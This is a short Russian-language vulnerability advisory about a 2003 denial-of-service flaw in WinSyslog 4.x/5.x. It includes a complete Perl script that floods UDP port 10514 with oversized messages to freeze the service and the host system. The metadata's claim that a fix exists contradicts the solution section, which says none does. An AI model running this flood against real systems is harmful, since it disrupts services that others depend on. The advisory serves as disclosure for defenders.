Дата публикации: | 15.10.2003 |
Всего просмотров: | 1259 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная сеть |
Воздействие: | Отказ в обслуживании |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
WinSyslog 4.x
WinSyslog 5.x |
Уязвимые версии: WinSyslog version 4.21 SP1
Описание: Уязвимость обнаружена в WinSyslog. Удаленный атакующий может заверсить работу приложения и системы. Удаленный атакующий может послать чрезмерно длинное сообщение к WinSyslog программе, чтобы завесить работу WinSyslog и операционной системы. Пример/Эксплоит: #!/usr/bin/perl #WinSyslog System Freeze Vulnerability use IO::Socket; $host = "192.168.1.44"; $port = "10514"; $data = "A"; $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n"; $ipaddr = inet_aton($host) || $host; $portaddr = sockaddr_in($port, $ipaddr); for ($count = 0; $count < 1000; $count ++) { $buf = ""; $buf .= "A"x((600+$count)*4); print "Length: ", length($buf), "\n"; send($socket, $buf, 0, $portaddr); print "sent\n"; } print "Done\n"; URL производителя:http://WinSyslog.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к программе только из доверенных IP адресов. |